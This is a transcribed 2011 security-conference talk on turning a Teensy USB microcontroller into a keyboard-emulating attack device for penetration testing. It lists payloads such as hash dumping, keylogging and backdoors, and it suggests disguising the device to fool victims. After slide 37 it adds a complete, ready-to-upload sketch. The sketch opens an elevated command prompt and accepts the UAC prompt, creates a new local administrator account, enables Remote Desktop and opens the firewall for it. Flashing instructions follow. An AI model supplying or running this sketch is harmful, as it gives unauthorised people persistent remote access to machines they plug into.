Mere Paas Teensy Hai (Nikhil Mittal)

Published at ClubHack 2011 Hacking and Security Conference.
Talk: Mere Paas Teensy Hai
Speaker: Nikhil Mittal

1. MERE PAAS TEENSY HAI, OR COMPROMISING A HIGHLY SECURE ENVIRONMENT, PART 2
   Nikhil Mittal (SamratAshok)
   ("Mere paas Teensy hai" is Hindi for "I have Teensy".)

2. ABOUT ME
   - SamratAshok. Twitter: @nikhil_mitt
   - Penetration Tester with PwC India
   - I am interested in offensive information security, new attack vectors and methodologies to pwn systems.
   - Creator of Kautilya and Maareech
   - Previous talks: "Ultimate Pen Testing: Compromising a Highly Secure Environment" (ClubHack '10); "Here Are Your Keystrokes" (Hackfest '11)
   - Upcoming talk: "Kautilya: Teensy Beyond Shell" (Black Hat Abu Dhabi '11)

3. OVERVIEW
   - Why the title?
   - Current state of pentesting
   - Questions being raised to us
   - The answer to the questions
   - What's done
   - What we will do
   - Limitations
   - Future
   - Conclusion

4. WHY THE TITLE?
   - What I told the ClubHack team: "I talked about compromising a highly secure environment last year, let's continue with the pwnage!!" Thanks to the team for buying that and allowing me to speak.
   - The real reason:
5. A TYPICAL PEN TEST SCENARIO
   - A client engagement comes with a list of IP addresses.
   - We need to complete the assignment in a very restrictive time frame.
   - The pressure is on us to deliver a "good" report with some high-severity findings (that "High" inside a red-coloured box).

6. CURRENT STATE OF PENTESTING
   Scan -> Vuln -> Exploit -> Report

7. (continued)
   - This is the best-case scenario; only the lucky ones find it. It works because legacy enterprise applications or business-critical applications are generally not upgraded.
   - There is almost no fun doing it that way.

8. SOME OF US DO IT BETTER
   Enum -> Scan -> Exploit -> Report

9. SOME OF US DO IT EVEN BETTER
   Enum + Intel -> Scan -> Exploit -> Post-Exp -> Report

10. WHY DO WE NEED TO EXPLOIT?
   - To gain access to the systems.
   - It shows the client the real threat: that we can actually make an impact on their business. No more "so what?"
   - We can create reports with "High" severity findings.
   - <Audience>

11. WHAT DO WE EXPLOIT?
   - Memory corruption bugs (server side, client side)
   - Humans
   - Misconfigurations
   - Design problems
   - <Audience>

12. QUESTIONS BEING RAISED TO US
   - Many times we find vulnerabilities but can't exploit them: no public exploit is available, exploitation is not allowed on the system, a countermeasure blocks it, or the exploit completes but no session is generated :P
   - Kya hai tumhare paas? (What do you have?)

13. QUESTIONS BEING RAISED TO US
   - Hardened systems, patches in place
   - Countermeasures blocking scans and exploits
   - Security incident monitoring and blocking
   - Kya hai tumhare paas? (What do you have?)

14. QUESTIONS BEING RAISED TO US
   - Just a bad day: exploit completed but no session was generated :P
   - Kya hai tumhare paas? (What do you have?)

15. ALTERNATIVES
   - Open file shares
   - Sticky slips
   - Social engineering attacks
   - Man in the Middle (many types)
   - SMB relay
   - <Audience>
16. THE ANSWER TO THE QUESTIONS: TEENSY
   - A USB microcontroller board.
   - We will use the Teensy++, the larger variant of the Teensy with more flash memory and I/O pins.
   - Available for $24 from pjrc.com
   - Mere paas Teensy hai (I have Teensy)

17. USING TEENSY
   - Find an unattended system and insert the Teensy into a USB port, or fool your victim by disguising it as a mouse, USB toy, thumb drive, etc.
   - Generally the Teensy needs just a minute to complete the job.
   - You can program it according to your needs.
   - Undetected and unblocked, Teensy works great for popping shells: the board enumerates as a USB keyboard (HID), so controls aimed at removable storage do not apply, and to the host it looks like an operator typing.

18. WHAT'S DONE
   - Arduino-based attack vector in the Social-Engineer Toolkit (SET) by David Kennedy.
   - Contains some really awesome payloads.
   - Almost all payloads are for popping shells.

19. WHAT WE WILL DO
   - Teensy can be used for much more than popping shells: it can perform pre- and post-exploitation tasks.
   - We will have a detailed look at some of these payloads and understand how to create payloads as per our needs.

20. DESCRIPTION OF PAYLOADS
   - More for Windows, as desktops are generally Windows-based.
   - Payloads vary from one-line commands to powerful scripts.
   - If you know PowerShell scripting, the payloads will make more sense and be easier to customize.

21. DEMO
22. WINDOWS USER ADD

23. THANK YOU

24. DEFAULT DNS

25. EDIT HOSTS FILE

26. ENABLE RDP

27. BUT
   - What if even Teensy doesn't work, with the other options already not working?
   - What if the USB ports are ripped out?
   - Would it be impossible to pwn such an environment?

28. ENABLE TELNET

29. FORCEFUL BROWSING

30. DOWNLOAD AND EXECUTE

31. SETHC AND UTILMAN BACKDOOR

32. UNINSTALL APPLICATION

33. REGISTRY EXPORT

34. TWEET

35. HASHDUMP

36. CODE EXECUTION

37. KEYLOGGING
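As an added example (not code from the deck, from SET or from Kautilya), here is a Teensyduino sketch that implements the "Windows user add" and "Enable RDP" payloads from the demo list above, driven exactly as the "Using Teensy" slide describes: plug in, wait, type. It assumes a Windows 7 target with a US keyboard layout, a logged-in local administrator so that the UAC prompt can be accepted with Alt+Y, and an English UAC dialog; the account name, password and delays are placeholders chosen for this example. It opens cmd rather than PowerShell because net, reg and netsh are parsed there exactly as typed.

```arduino
// Added example, not code from the deck, SET or Kautilya: a Teensyduino
// sketch (Tools > USB Type > Keyboard) that types the "Windows user add"
// and "Enable RDP" payloads the way the "Using Teensy" slide describes.
//
// Assumptions, all mine rather than the deck's: a Windows 7 target with a
// US keyboard layout; the logged-in user is a local administrator, so the
// UAC prompt can be accepted with Alt+Y; an English UAC dialog.
// NEW_USER and NEW_PASS are placeholders.

const char *NEW_USER = "svc_support";   // placeholder account name
const char *NEW_PASS = "Placeh0lder!";  // placeholder password

// Press a key chord (modifier + key) as one HID report, then release all.
// set_modifier/set_key1/send_now are the Teensyduino raw-report calls; a
// plain Keyboard.print() cannot express Ctrl+Shift+Enter.
void chord(int modifier, int key) {
  Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// Open an elevated command prompt. Win+R would give an unelevated shell,
// so tap the Windows key, type into the Start menu search box, launch with
// Ctrl+Shift+Enter ("Run as administrator") and accept the UAC prompt.
void openElevatedCmd() {
  chord(MODIFIERKEY_GUI, 0);            // tap Win: Start menu, focus in search box
  delay(1000);
  Keyboard.print("cmd");
  delay(1000);
  chord(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT, KEY_ENTER);
  delay(2000);                          // UAC secure desktop comes up
  chord(MODIFIERKEY_ALT, KEY_Y);        // "Yes" (assumes English UAC dialog)
  delay(2000);                          // wait for the console window
}

// Type one line and press Enter. Every line is a self-contained command, so
// if one fails the next still runs: the host never tells the Teensy anything.
void typeLine(const char *line) {
  Keyboard.println(line);
  delay(500);
}

void setup() {
  delay(5000);   // let Windows finish enumerating the HID keyboard
  openElevatedCmd();

  // Payload 1: WINDOWS USER ADD (a new local administrator account).
  Keyboard.print("net user ");
  Keyboard.print(NEW_USER);
  Keyboard.print(" ");
  Keyboard.print(NEW_PASS);
  typeLine(" /add");
  Keyboard.print("net localgroup administrators ");
  Keyboard.print(NEW_USER);
  typeLine(" /add");

  // Payload 2: ENABLE RDP (clear the deny flag, then open the built-in
  // "remote desktop" firewall rule group).
  typeLine("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" "
           "/v fDenyTSConnections /t REG_DWORD /d 0 /f");
  typeLine("netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes");

  typeLine("exit");   // close the window so nothing is left on screen
}

void loop() {
  // Everything ran once from setup(); nothing to do afterwards.
}
```

Build with Tools > USB Type set to Keyboard, upload, unplug, and plug into the target; the sketch runs as soon as the board enumerates. The delays are deliberately generous because the channel is one-way: the board cannot see whether the Start menu or the UAC prompt has appeared, so every wait must cover the slow case, and each typed line must make sense on its own even if the line before it failed. The other one-line payloads in the list (default DNS, hosts file, telnet) are the same skeleton with different lines passed to typeLine().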
38. LIMITATIONS
   - Limited storage on the Teensy. Resolved if you attach an SD card to the Teensy.
   - Inability to "read" from the system: you have to assume the responses of the victim OS, because the traffic is one-way. The only data a host sends back to a HID keyboard is the LED state (Caps/Num/Scroll Lock), so a payload must be written to succeed blind: generous delays before each step, and steps that do not depend on the output of the previous one.

39. FUTURE
   - Kautilya
   - Improvement in current payloads
   - New payloads for non-traditional shells
   - Dropping executables using additional storage (already done)

40. CONCLUSION
   - If used wisely, Teensy can be used as a complete penetration testing device, though with its own limitations.
   - It's a cheap device, so use it.
   - Please use Kautilya and give feedback after it is released.
   - Mere paas Teensy hai (I have Teensy)

41. THANK YOU
   - Questions? Insults? Feedback?